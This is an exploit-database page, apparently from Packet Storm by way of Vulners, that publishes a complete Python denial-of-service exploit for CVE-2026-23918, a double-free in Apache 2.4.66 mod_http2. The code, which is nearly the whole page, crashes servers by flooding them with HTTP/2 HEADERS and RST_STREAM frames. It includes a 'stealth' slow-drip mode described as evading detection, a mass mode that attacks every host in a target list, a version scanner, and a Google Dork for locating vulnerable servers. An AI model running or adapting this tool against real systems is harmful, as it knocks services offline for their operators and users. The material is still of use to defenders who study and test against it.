Lucene search
K

📄 Apache HTTP Server 2.4.66 Denial of Service

🗓️ 29 May 2026 00:00:00Reported by xeloxaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 22 Views

CVE-2026-23918: Apache HTTP Server 2.4.66 mod_http2 double-free DoS via rapid HEADERS and RST_STREAM.

Related
Code
# Exploit Title: Apache HTTP Server 2.4.66 - 'mod_http2' Double-Free Denial of Service
    # Google Dork: intext:"Apache/2.4.66" "HTTP/2"
    # Date: 2026-05-06
    # Exploit Author: xeloxa (https://github.com/xeloxa/) <[email protected]>
    # Vendor Homepage: https://httpd.apache.org/
    # Software Link: https://archive.apache.org/dist/httpd/httpd-2.4.66.tar.gz
    # Version: 2.4.66
    # Tested on: Debian / Ubuntu
    # CVE : CVE-2026-23918
    
    """
    CVE-2026-23918 - Apache mod_http2 Double-Free PoC
    
    Quick summary: This bug (CWE-415) hits Apache 2.4.66. It's a race condition
    in the stream cleanup path. If you spam HEADERS and RST_STREAM fast enough,
    you can trigger a double-free and crash the worker.
    
    Author: xeloxa (https://github.com/xeloxa/) <[email protected]>
    Found by: Bartlomiej Dmitruk & Stanislaw Strzalkowski
    """
    
    import argparse
    import json
    import os
    import signal
    import socket
    import ssl
    import sys
    import threading
    import time
    from collections import defaultdict
    from dataclasses import dataclass, field
    from datetime import datetime
    from typing import Dict, List, Optional, Tuple
    
    # ---------------------------------------------------------------------------
    # Dependency Check
    # ---------------------------------------------------------------------------
    try:
        import h2.config
        import h2.connection
        import h2.events
    
        HAS_H2 = True
    except ImportError:
        HAS_H2 = False
    
    
    # ---------------------------------------------------------------------------
    # ANSI Colors (for terminal output)
    # ---------------------------------------------------------------------------
    class Color:
        RED = "\033[91m"
        GREEN = "\033[92m"
        YELLOW = "\033[93m"
        BLUE = "\033[94m"
        MAGENTA = "\033[95m"
        CYAN = "\033[96m"
        BOLD = "\033[1m"
        RESET = "\033[0m"
    
    
    def c(text: str, color: str) -> str:
        """Wrap text in color if output is a terminal."""
        if sys.stdout.isatty():
            return f"{color}{text}{Color.RESET}"
        return text
    
    
    def print_banner(title: str, color: str = Color.BOLD) -> None:
        """Print a consistent tool banner with author info."""
        print(f"{'=' * 60}")
        print(c(title, color))
        print(f"Author: xeloxa (https://github.com/xeloxa/)")
        print(f"{'=' * 60}")
    
    
    # ---------------------------------------------------------------------------
    # Data Structures
    # ---------------------------------------------------------------------------
    @dataclass
    class ExploitStats:
        """Just a thread-safe counter for the stats."""
    
        connections: int = 0
        requests: int = 0
        resets: int = 0
        conn_errors: int = 0
        stream_errors: int = 0
        crashes: int = 0
        lock: threading.Lock = field(default_factory=threading.Lock)
    
        def inc(self, attr: str, delta: int = 1) -> None:
            with self.lock:
                setattr(self, attr, getattr(self, attr) + delta)
    
        def snapshot(self) -> Dict[str, int]:
            with self.lock:
                return {
                    "connections": self.connections,
                    "requests": self.requests,
                    "resets": self.resets,
                    "conn_errors": self.conn_errors,
                    "stream_errors": self.stream_errors,
                    "crashes": self.crashes,
                }
    
    
    # ---------------------------------------------------------------------------
    # SSL / HTTP/2 Connection Helpers
    # ---------------------------------------------------------------------------
    def create_ssl_context(
        alpn_protocols: Optional[List[str]] = None,
    ) -> ssl.SSLContext:
        """Create an SSL context configured for HTTP/2 ALPN negotiation."""
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        if alpn_protocols is None:
            alpn_protocols = ["h2"]
        ctx.set_alpn_protocols(alpn_protocols)
        return ctx
    
    
    def establish_h2_connection(
        host: str,
        port: int,
        timeout: float = 5.0,
        use_ssl: bool = True,
    ) -> Tuple[Optional[socket.socket], Optional[h2.connection.H2Connection]]:
        """
        Sets up an H2 connection. 
        Returns (socket, h2_connection) or (None, None) if something breaks.
        """
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(timeout)
            sock.connect((host, port))
    
            if use_ssl:
                ctx = create_ssl_context()
                sock = ctx.wrap_socket(sock, server_hostname=host)
    
            config = h2.config.H2Configuration(client_side=True)
            conn = h2.connection.H2Connection(config=config)
            conn.initiate_connection()
            sock.sendall(conn.data_to_send())
    
            # Receive server preface (SETTINGS frame)
            data = sock.recv(8192)
            if not data:
                sock.close()
                return None, None
            conn.receive_data(data)
            sock.sendall(conn.data_to_send())
    
            return sock, conn
        except Exception:
            try:
                sock.close()
            except Exception:
                pass
            return None, None
    
    
    # ---------------------------------------------------------------------------
    # Mode 1: DoS - Rapid RST Attack
    # ---------------------------------------------------------------------------
    class RapidRSTDoS:
        """
        The "classic" Rapid-RST DoS.
        
        We send a HEADERS frame and immediately follow up with an RST_STREAM. 
        If the server hasn't registered the stream yet, it'll trigger two 
        different cleanup callbacks. Both try to free the same memory. 
        Boom - SIGSEGV.
        """
    
        def __init__(
            self,
            target: str,
            port: int,
            workers: int = 100,
            intensity: int = 7,
            use_ssl: bool = True,
            timeout: float = 5.0,
            verbose: bool = False,
            json_output: bool = False,
        ):
            self.target = target
            self.port = port
            self.num_workers = workers
            self.intensity = max(1, min(10, intensity))
            self.use_ssl = use_ssl
            self.timeout = timeout
            self.verbose = verbose
            self.json_output = json_output
    
            self.running = True
            self.crashed = False
            self.stats = ExploitStats()
            self.start_time: Optional[float] = None
    
        def is_server_alive(self) -> bool:
            """Check if the target server is responsive via HTTP/2."""
            sock, conn = establish_h2_connection(
                self.target, self.port, timeout=3.0, use_ssl=self.use_ssl
            )
            if sock is None:
                return False
            try:
                sock.close()
            except Exception:
                pass
            return True
    
        def worker(self, worker_id: int) -> None:
            """
            Worker thread that continuously opens HTTP/2 connections and sends
            HEADERS+RST_STREAM frame sequences to trigger the double-free.
            """
            streams_per_conn = 50
            reset_interval = max(1, 11 - self.intensity)  # Lower = more resets
    
            while self.running:
                sock, conn = establish_h2_connection(
                    self.target,
                    self.port,
                    timeout=self.timeout,
                    use_ssl=self.use_ssl,
                )
                if sock is None:
                    self.stats.inc("conn_errors")
                    time.sleep(0.1)
                    continue
    
                self.stats.inc("connections")
    
                try:
                    sent = 0
                    while sent < streams_per_conn and self.running:
                        try:
                            stream_id = conn.get_next_available_stream_id()
                            conn.send_headers(
                                stream_id,
                                [
                                    (b":method", b"GET"),
                                    (b":scheme", b"https" if self.use_ssl else b"http"),
                                    (b":authority", self.target.encode()),
                                    (b":path", b"/"),
                                ],
                            )
                            sock.sendall(conn.data_to_send())
                            self.stats.inc("requests")
    
                            # Send RST_STREAM on configured interval
                            if sent % reset_interval == 0:
                                conn.reset_stream(stream_id, error_code=1)
                                sock.sendall(conn.data_to_send())
                                self.stats.inc("resets")
    
                            sent += 1
                            # Small delay to avoid overwhelming local resources
                            time.sleep(0.001 * (11 - self.intensity))
    
                        except Exception:
                            self.stats.inc("stream_errors")
                            break
    
                    # Gracefully close the connection
                    conn.close_connection()
                    try:
                        sock.sendall(conn.data_to_send())
                    except Exception:
                        pass
    
                except Exception:
                    pass
                finally:
                    try:
                        sock.close()
                    except Exception:
                        pass
    
        def monitor(self) -> None:
            """Monitor thread that checks server aliveness and prints stats."""
            checks_since_alive = 0
            last_report = 0
    
            while self.running:
                time.sleep(0.5)
                alive = self.is_server_alive()
    
                if alive:
                    checks_since_alive = 0
                    elapsed = int(time.time() - self.start_time)
                    if elapsed - last_report >= 10:
                        last_report = elapsed
                        snap = self.stats.snapshot()
                        if self.json_output:
                            print(
                                json.dumps(
                                    {
                                        "timestamp": datetime.now().isoformat(),
                                        "elapsed_s": elapsed,
                                        "status": "alive",
                                        **snap,
                                    }
                                )
                            )
                        else:
                            print(
                                f" {c(f'[t={elapsed}s]', Color.CYAN)} "
                                f"conns={snap['connections']} "
                                f"reqs={snap['requests']} "
                                f"resets={snap['resets']} "
                                f"{c('OK', Color.GREEN)}"
                            )
                else:
                    checks_since_alive += 1
                    if checks_since_alive >= 2 and not self.crashed:
                        self.crashed = True
                        self.stats.inc("crashes")
                        elapsed = int(time.time() - self.start_time)
                        if self.json_output:
                            print(
                                json.dumps(
                                    {
                                        "timestamp": datetime.now().isoformat(),
                                        "elapsed_s": elapsed,
                                        "status": "CRASHED",
                                        **self.stats.snapshot(),
                                    }
                                )
                            )
                        else:
                            print(f"\n{'=' * 60}")
                            print(
                                c(
                                    f"!!! SERVER CRASHED at t={elapsed}s !!!",
                                    Color.RED + Color.BOLD,
                                )
                            )
                            print(
                                f"Stats: {json.dumps(self.stats.snapshot(), indent=2)}"
                            )
                            print(f"{'=' * 60}")
                        self.running = False
                        return
    
        def run(self) -> None:
            """Execute the DoS exploit."""
            if not self.json_output:
                print_banner("CVE-2026-23918 - Apache Double-Free DoS", Color.BOLD + Color.RED)
                print(f"Target: {self.target}:{self.port}")
                print(f"Mode  : Rapid-RST")
                print(f"Stats : {self.num_workers} workers | Intensity {self.intensity}")
                print(f"SSL   : {'On' if self.use_ssl else 'Off'}")
                print(f"{'=' * 60}")
    
            if not HAS_H2:
                print(c("[!] h2 library missing. Install: pip3 install h2", Color.RED))
                sys.exit(1)
    
            # Pre-flight server check
            if not self.json_output:
                print(c("[*] Checking if server is up...", Color.YELLOW))
            if not self.is_server_alive():
                print(c(f"[!] Can't reach {self.target}:{self.port}", Color.RED))
                sys.exit(1)
            if not self.json_output:
                print(c("[+] Server's up. Sending payloads...\n", Color.GREEN))
    
            # Launch workers
            self.start_time = time.time()
            workers = []
            for i in range(self.num_workers):
                t = threading.Thread(target=self.worker, args=(i,), daemon=True)
                t.start()
                workers.append(t)
    
            # Run monitor (blocks until crash detected or Ctrl+C)
            self.monitor()
    
            # Wait for workers to finish
            for t in workers:
                t.join(timeout=2)
    
            # Final report
            snap = self.stats.snapshot()
            if self.json_output:
                print(
                    json.dumps(
                        {
                            "timestamp": datetime.now().isoformat(),
                            "final": True,
                            "crashed": self.crashed,
                            **snap,
                        }
                    )
                )
            else:
                print(f"\n{'=' * 60}")
                print(c("ATTACK RESULTS", Color.BOLD))
                print(f"{'=' * 60}")
                print(f"Connections: {snap['connections']}")
                print(f"Requests   : {snap['requests']}")
                print(f"Resets     : {snap['resets']}")
                print(f"Errors     : {snap['conn_errors']} (conn) / {snap['stream_errors']} (stream)")
                if self.crashed:
                    print(c("\n[!] CRASH DETECTED - Double-free confirmed.", Color.RED + Color.BOLD))
                else:
                    print(c("\n[-] Server's still alive.", Color.YELLOW))
                print(f"{'=' * 60}")
    
    
    # ---------------------------------------------------------------------------
    # Mode 2: Slow-Drip DoS (Stealth)
    # ---------------------------------------------------------------------------
    class SlowDripDoS:
        """
        Low-bandwidth, sustained denial of service.
    
        Uses fewer connections and longer intervals between RST_STREAM frames
        to evade detection while maintaining pressure on the target.
        """
    
        def __init__(
            self,
            target: str,
            port: int,
            workers: int = 5,
            intensity: int = 3,
            duration_minutes: int = 30,
            use_ssl: bool = True,
            timeout: float = 5.0,
            json_output: bool = False,
        ):
            self.target = target
            self.port = port
            self.num_workers = max(1, workers)
            self.intensity = max(1, min(5, intensity))
            self.duration_seconds = duration_minutes * 60
            self.use_ssl = use_ssl
            self.timeout = timeout
            self.json_output = json_output
    
            self.running = True
            self.stats = ExploitStats()
            self.start_time: Optional[float] = None
    
        def worker(self, worker_id: int) -> None:
            """Slow-drip worker - lower frequency, sustained attack."""
            while self.running and (
                time.time() - self.start_time < self.duration_seconds
            ):
                sock, conn = establish_h2_connection(
                    self.target, self.port, timeout=self.timeout, use_ssl=self.use_ssl
                )
                if sock is None:
                    self.stats.inc("conn_errors")
                    time.sleep(0.5)
                    continue
    
                self.stats.inc("connections")
                try:
                    stream_id = conn.get_next_available_stream_id()
                    conn.send_headers(
                        stream_id,
                        [
                            (b":method", b"GET"),
                            (b":scheme", b"https" if self.use_ssl else b"http"),
                            (b":authority", self.target.encode()),
                            (b":path", b"/"),
                        ],
                    )
                    sock.sendall(conn.data_to_send())
                    self.stats.inc("requests")
    
                    # Small delay before reset - simulates slow client
                    time.sleep(0.01)
                    conn.reset_stream(stream_id, error_code=1)
                    sock.sendall(conn.data_to_send())
                    self.stats.inc("resets")
    
                    conn.close_connection()
                    sock.sendall(conn.data_to_send())
                except Exception:
                    self.stats.inc("stream_errors")
                finally:
                    try:
                        sock.close()
                    except Exception:
                        pass
    
                # Longer sleep for stealth
                delay = max(1.0, (6 - self.intensity) * 2.0)
                time.sleep(delay)
    
        def run(self) -> None:
            """Execute the slow-drip DoS."""
            if not self.json_output:
                print_banner("CVE-2026-23918 - Slow-Drip (Stealth)", Color.BOLD + Color.YELLOW)
                print(f"Target: {self.target}:{self.port}")
                print(f"Time  : {self.duration_seconds // 60} min")
                print(f"Workers: {self.num_workers} | Intensity: {self.intensity}")
                print(f"{'=' * 60}")
    
            if not HAS_H2:
                print(c("[!] h2 library missing. Install: pip3 install h2", Color.RED))
                sys.exit(1)
    
            self.start_time = time.time()
            workers = []
            for i in range(self.num_workers):
                t = threading.Thread(target=self.worker, args=(i,), daemon=True)
                t.start()
                workers.append(t)
    
            # Wait for duration or Ctrl+C
            try:
                while self.running and (
                    time.time() - self.start_time < self.duration_seconds
                ):
                    time.sleep(5)
                    elapsed = int(time.time() - self.start_time)
                    snap = self.stats.snapshot()
                    if self.json_output:
                        print(
                            json.dumps(
                                {
                                    "timestamp": datetime.now().isoformat(),
                                    "elapsed_s": elapsed,
                                    **snap,
                                }
                            )
                        )
                    else:
                        remaining = self.duration_seconds - elapsed
                        print(
                            f" {c(f'[{elapsed}s/{remaining}s remaining]', Color.CYAN)} "
                            f"conns={snap['connections']} "
                            f"resets={snap['resets']}"
                        )
            except KeyboardInterrupt:
                pass
    
            self.running = False
            for t in workers:
                t.join(timeout=2)
    
            if not self.json_output:
                print(c("\n[*] Slow-drip attack complete.", Color.GREEN))
    
    
    # ---------------------------------------------------------------------------
    # Mode 3: Mass DoS
    # ---------------------------------------------------------------------------
    class MassDoS:
        """Multi-target sustained denial of service."""
    
        def __init__(
            self,
            targets_file: str,
            workers_per_target: int = 50,
            intensity: int = 7,
            duration_minutes: int = 30,
            use_ssl: bool = True,
            timeout: float = 5.0,
            json_output: bool = False,
        ):
            self.targets = self._load_targets(targets_file)
            self.workers_per_target = workers_per_target
            self.intensity = max(1, min(10, intensity))
            self.duration_seconds = duration_minutes * 60
            self.use_ssl = use_ssl
            self.timeout = timeout
            self.json_output = json_output
    
            self.running = True
            self.start_time: Optional[float] = None
            self.target_results: Dict[Tuple[str, int], Dict] = defaultdict(
                lambda: {
                    "status": "unknown",
                    "connections": 0,
                    "conn_errors": 0,
                    "requests": 0,
                    "resets": 0,
                    "crashes": 0,
                }
            )
            self.results_lock = threading.Lock()
    
        @staticmethod
        def _load_targets(path: str) -> List[Tuple[str, int]]:
            """Load targets from file (format: host:port or host)."""
            targets = []
            with open(path) as f:
                for line in f:
                    line = line.strip()
                    if not line or line.startswith("#"):
                        continue
                    if ":" in line:
                        host, port = line.rsplit(":", 1)
                        targets.append((host.strip(), int(port.strip())))
                    else:
                        targets.append((line.strip(), 443))
            return targets
    
        def is_alive(self, host: str, port: int) -> bool:
            """Quick aliveness check."""
            sock, conn = establish_h2_connection(
                host, port, timeout=3.0, use_ssl=self.use_ssl
            )
            if sock is None:
                return False
            try:
                sock.close()
            except Exception:
                pass
            return True
    
        def worker(self, host: str, port: int) -> None:
            """Attack worker for a specific target."""
            results = self.target_results[(host, port)]
            reset_interval = max(1, 11 - self.intensity)
            sent = 0
    
            while self.running and (
                time.time() - self.start_time < self.duration_seconds
            ):
                sock, conn = establish_h2_connection(
                    host, port, timeout=self.timeout, use_ssl=self.use_ssl
                )
                if sock is None:
                    with self.results_lock:
                        results["conn_errors"] += 1
                    time.sleep(0.5)
                    continue
    
                with self.results_lock:
                    results["connections"] += 1
    
                try:
                    while self.running and (
                        time.time() - self.start_time < self.duration_seconds
                    ):
                        try:
                            sid = conn.get_next_available_stream_id()
                            conn.send_headers(
                                sid,
                                [
                                    (b":method", b"GET"),
                                    (
                                        b":scheme",
                                        b"https" if self.use_ssl else b"http",
                                    ),
                                    (b":authority", host.encode()),
                                    (b":path", b"/"),
                                ],
                            )
                            sock.sendall(conn.data_to_send())
                            with self.results_lock:
                                results["requests"] += 1
                            sent += 1
    
                            if sent % reset_interval == 0:
                                conn.reset_stream(sid, error_code=1)
                                sock.sendall(conn.data_to_send())
                                with self.results_lock:
                                    results["resets"] += 1
                        except Exception:
                            break
    
                    conn.close_connection()
                    try:
                        sock.sendall(conn.data_to_send())
                    except Exception:
                        pass
                except Exception:
                    pass
                finally:
                    try:
                        sock.close()
                    except Exception:
                        pass
    
        def monitor_target(self, host: str, port: int) -> None:
            """Monitor aliveness for a specific target."""
            results = self.target_results[(host, port)]
            while self.running and (
                time.time() - self.start_time < self.duration_seconds
            ):
                alive = self.is_alive(host, port)
                with self.results_lock:
                    if not alive:
                        if results["status"] != "down":
                            results["status"] = "down"
                            results["crashes"] += 1
                            elapsed = int(time.time() - self.start_time)
                            if not self.json_output:
                                print(
                                    c(
                                        f" [t={elapsed}s] {host}:{port} - SERVER DOWN",
                                        Color.RED,
                                    )
                                )
                    else:
                        results["status"] = "up"
                time.sleep(5)
    
        def print_dashboard(self) -> None:
            """Print live status dashboard."""
            print("\033[2J\033[H", end="")  # ANSI escape sequence to clear screen
            elapsed = int(time.time() - self.start_time)
            remaining = max(0, self.duration_seconds - elapsed)
            print(f"{'=' * 70}")
            print(f" CVE-2026-23918 Mass DoS | {elapsed}s elapsed | {remaining}s remaining")
            print(f"{'=' * 70}")
            print(
                f"{'Target':<35} {'Status':<10} {'Conns':<8} {'Err':<5} {'Reqs':<8} {'Resets':<8} {'Crashes':<8}"
            )
            print("-" * 80)
            for host, port in self.targets:
                r = self.target_results[(host, port)]
                print(
                    f"{host+':'+str(port):<35} "
                    f"{r['status']:<10} {r['connections']:<8} {r['conn_errors']:<5} "
                    f"{r['requests']:<8} {r['resets']:<8} {r['crashes']:<8}"
                )
            print(f"{'=' * 70}")
    
        def run(self) -> None:
            """Execute mass DoS attack."""
            if not self.json_output:
                print_banner("CVE-2026-23918 - Mass Scan/Attack", Color.BOLD + Color.RED)
                print(f"Targets: {len(self.targets)} | Time: {self.duration_seconds // 60} min")
                print(f"Workers: {self.workers_per_target} per target | Intensity: {self.intensity}")
                print(f"{'=' * 60}\n")
    
            if not HAS_H2:
                print(c("[!] h2 library missing: pip3 install h2", Color.RED))
                sys.exit(1)
    
            self.start_time = time.time()
    
            # Launch workers for each target
            all_workers = []
            for host, port in self.targets:
                for _ in range(self.workers_per_target):
                    t = threading.Thread(
                        target=self.worker, args=(host, port), daemon=True
                    )
                    t.start()
                    all_workers.append(t)
    
                # Launch a monitor for each target
                mt = threading.Thread(
                    target=self.monitor_target, args=(host, port), daemon=True
                )
                mt.start()
                all_workers.append(mt)
    
            # Dashboard loop
            try:
                while self.running and (
                    time.time() - self.start_time < self.duration_seconds
                ):
                    if not self.json_output:
                        self.print_dashboard()
                    time.sleep(10)
            except KeyboardInterrupt:
                pass
    
            self.running = False
            for t in all_workers:
                t.join(timeout=2)
    
            if not self.json_output:
                self.print_dashboard()
                print(c("\n[*] Mass DoS complete.", Color.GREEN))
    
    
    # ---------------------------------------------------------------------------
    # Mode 4: RCE Detection (Passive)
    # ---------------------------------------------------------------------------
    def rce_detect(
        target: str, port: int, timeout: float = 5.0, json_output: bool = False
    ) -> Dict:
        """
        Passive check. We just look at headers and version info to see 
        if the target might be vulnerable. No exploit payloads sent.
        """
        if not HAS_H2:
            if json_output:
                print(
                    json.dumps(
                        {"error": "h2 library not installed. Run: pip3 install h2"}
                    )
                )
            else:
                print(c("[!] h2 library missing. Install: pip3 install h2", Color.RED))
            return {"error": "h2 library not installed"}
    
        result = {
            "target": f"{target}:{port}",
            "timestamp": datetime.now().isoformat(),
            "reachable": False,
            "http2_supported": False,
            "server_header": None,
            "apache_version": None,
            "likely_vulnerable": False,
            "cve_applicable": False,
            "notes": [],
        }
    
        # Try HTTP/2 connection
        sock, conn = establish_h2_connection(target, port, timeout=timeout, use_ssl=True)
        if sock is None:
            result["notes"].append("Target not reachable or HTTP/2 not supported")
            return result
    
        result["reachable"] = True
        result["http2_supported"] = True
    
        # Send a GET request and observe response
        try:
            stream_id = conn.get_next_available_stream_id()
            conn.send_headers(
                stream_id,
                [
                    (b":method", b"GET"),
                    (b":scheme", b"https"),
                    (b":authority", target.encode()),
                    (b":path", b"/"),
                ],
            )
            conn.end_stream(stream_id)
            sock.sendall(conn.data_to_send())
    
            # Receive response
            data = sock.recv(8192)
            if data:
                events = conn.receive_data(data)
                for event in events:
                    if isinstance(event, h2.events.ResponseReceived):
                        for name, value in event.headers:
                            header_name = name.decode("utf-8", errors="replace").lower()
                            header_value = value.decode("utf-8", errors="replace")
                            if header_name == "server":
                                result["server_header"] = header_value
                                # Try to extract Apache version
                                if "apache" in header_value.lower():
                                    parts = header_value.split("/")
                                    if len(parts) > 1:
                                        result["apache_version"] = (
                                            parts[-1].strip().split()[0]
                                        )
        except Exception as e:
            result["notes"].append(f"Error during detection: {e}")
    
        try:
            sock.close()
        except Exception:
            pass
    
        # Analyze vulnerability status
        if result["apache_version"]:
            # Apache 2.4.66 is the affected version per CVE record
            if result["apache_version"] == "2.4.66":
                result["likely_vulnerable"] = True
                result["cve_applicable"] = True
                result["notes"].append("Apache 2.4.66 detected - VULNERABLE to CVE-2026-23918")
            else:
                try:
                    # Parse version for comparison
                    version_parts = result["apache_version"].split(".")
                    if len(version_parts) >= 3:
                        major, minor, patch = (
                            int(version_parts[0]),
                            int(version_parts[1]),
                            int(version_parts[2]),
                        )
                        if (major, minor, patch) >= (2, 4, 67):
                            result["notes"].append(
                                f"Apache {result['apache_version']} - PATCHED (>= 2.4.67)"
                            )
                        elif (major, minor, patch) < (2, 4, 66):
                            result["notes"].append(
                                f"Apache {result['apache_version']} - outside confirmed CVE range (< 2.4.66)"
                            )
                        else:
                            result["cve_applicable"] = True
                            result["likely_vulnerable"] = True
                except (ValueError, IndexError):
                    result["notes"].append("Could not parse version string")
        elif result["http2_supported"]:
            result["notes"].append(
                "HTTP/2 supported but version unknown - manual verification needed"
            )
            result["cve_applicable"] = True  # Potentially vulnerable
    
        if json_output:
            print(json.dumps(result, indent=2))
        else:
            print_banner("Vulnerability Scan Report", Color.BOLD)
            print(f"Target : {result['target']}")
            print(f"H2     : {'Supported' if result['http2_supported'] else 'Not found'}")
            print(f"Server : {result['server_header'] or 'Unknown'}")
            print(f"Apache : {result['apache_version'] or 'Unknown'}")
            
            status = c("LIKELY VULNERABLE", Color.RED + Color.BOLD) if result['likely_vulnerable'] else c("Likely safe", Color.GREEN)
            print(f"Status : {status}")
            
            if result["notes"]:
                print(f"Notes  :")
                for note in result["notes"]:
                    print(f"  - {note}")
            print(f"{'=' * 60}")
    
        return result
    
    
    # ---------------------------------------------------------------------------
    # Signal Handling
    # ---------------------------------------------------------------------------
    def signal_handler(sig: int, frame) -> None:
        """Handle interrupt signals for a clean exit."""
        print(c("\n[!] Received interrupt - shutting down...", Color.YELLOW))
        sys.exit(0)
    
    
    # ---------------------------------------------------------------------------
    # Main Entry Point
    # ---------------------------------------------------------------------------
    def main() -> None:
        parser = argparse.ArgumentParser(
            description="CVE-2026-23918 - Apache HTTP/2 Double-Free Exploit",
            formatter_class=argparse.RawDescriptionHelpFormatter,
            epilog="""
    Examples:
      %(prog)s --target 192.168.1.100 --port 8443 --mode dos
      %(prog)s --target example.com --mode rce-detect
      %(prog)s --targets targets.txt --mode mass --duration 30
      %(prog)s --target 10.0.0.50 --mode slow-drip -w 5 -i 3 -d 60
            """,
        )
    
        parser.add_argument(
            "--target", "-t", help="Target IP or hostname"
        )
        parser.add_argument(
            "--port", "-p", type=int, default=443, help="Target port (default: 443)"
        )
        parser.add_argument(
            "--mode",
            "-m",
            choices=["dos", "slow-drip", "mass", "rce-detect"],
            default="dos",
            help="Exploit mode (default: dos)",
        )
        parser.add_argument(
            "--targets",
            "-T",
            help="File with target list for mass mode (format: host:port per line)",
        )
        parser.add_argument(
            "--workers",
            "-w",
            type=int,
            default=100,
            help="Number of concurrent worker threads (default: 100)",
        )
        parser.add_argument(
            "--intensity",
            "-i",
            type=int,
            default=7,
            help="Attack intensity 1-10 (default: 7)",
        )
        parser.add_argument(
            "--duration",
            "-d",
            type=int,
            default=30,
            help="Attack duration in minutes for slow-drip/mass modes (default: 30)",
        )
        parser.add_argument(
            "--timeout",
            type=float,
            default=5.0,
            help="Connection timeout in seconds (default: 5)",
        )
        parser.add_argument(
            "--no-ssl",
            action="store_true",
            help="Use plaintext HTTP/2 (h2c) instead of HTTPS (h2)",
        )
        parser.add_argument(
            "--verbose", "-v", action="store_true", help="Verbose output"
        )
        parser.add_argument(
            "--json", action="store_true", dest="json_output", help="JSON output format"
        )
    
        args = parser.parse_args()
    
        # Validate arguments
        if args.mode in ("dos", "slow-drip", "rce-detect") and not args.target:
            parser.error(f"--target is required for mode '{args.mode}'")
        if args.mode == "mass" and not args.targets:
            parser.error("--targets file is required for mass mode")
    
        use_ssl = not args.no_ssl
    
        # Register signal handlers for clean exit
        signal.signal(signal.SIGINT, signal_handler)
        signal.signal(signal.SIGTERM, signal_handler)
    
        # Dispatch to selected mode
        try:
            if args.mode == "dos":
                exploit = RapidRSTDoS(
                    target=args.target,
                    port=args.port,
                    workers=args.workers,
                    intensity=args.intensity,
                    use_ssl=use_ssl,
                    timeout=args.timeout,
                    verbose=args.verbose,
                    json_output=args.json_output,
                )
                exploit.run()
    
            elif args.mode == "slow-drip":
                exploit = SlowDripDoS(
                    target=args.target,
                    port=args.port,
                    workers=args.workers,
                    intensity=args.intensity,
                    duration_minutes=args.duration,
                    use_ssl=use_ssl,
                    timeout=args.timeout,
                    json_output=args.json_output,
                )
                exploit.run()
    
            elif args.mode == "mass":
                exploit = MassDoS(
                    targets_file=args.targets,
                    workers_per_target=args.workers,
                    intensity=args.intensity,
                    duration_minutes=args.duration,
                    use_ssl=use_ssl,
                    timeout=args.timeout,
                    json_output=args.json_output,
                )
                exploit.run()
    
            elif args.mode == "rce-detect":
                rce_detect(
                    target=args.target,
                    port=args.port,
                    timeout=args.timeout,
                    json_output=args.json_output,
                )
    
        except KeyboardInterrupt:
            print(c("\n[!] Interrupted by user.", Color.YELLOW))
            sys.exit(0)
        except Exception as e:
            print(c(f"\n[!] Fatal error: {e}", Color.RED))
            sys.exit(1)
    
    
    if __name__ == "__main__":
        main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 May 2026 00:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.18.8
EPSS0.00952
SSVC
22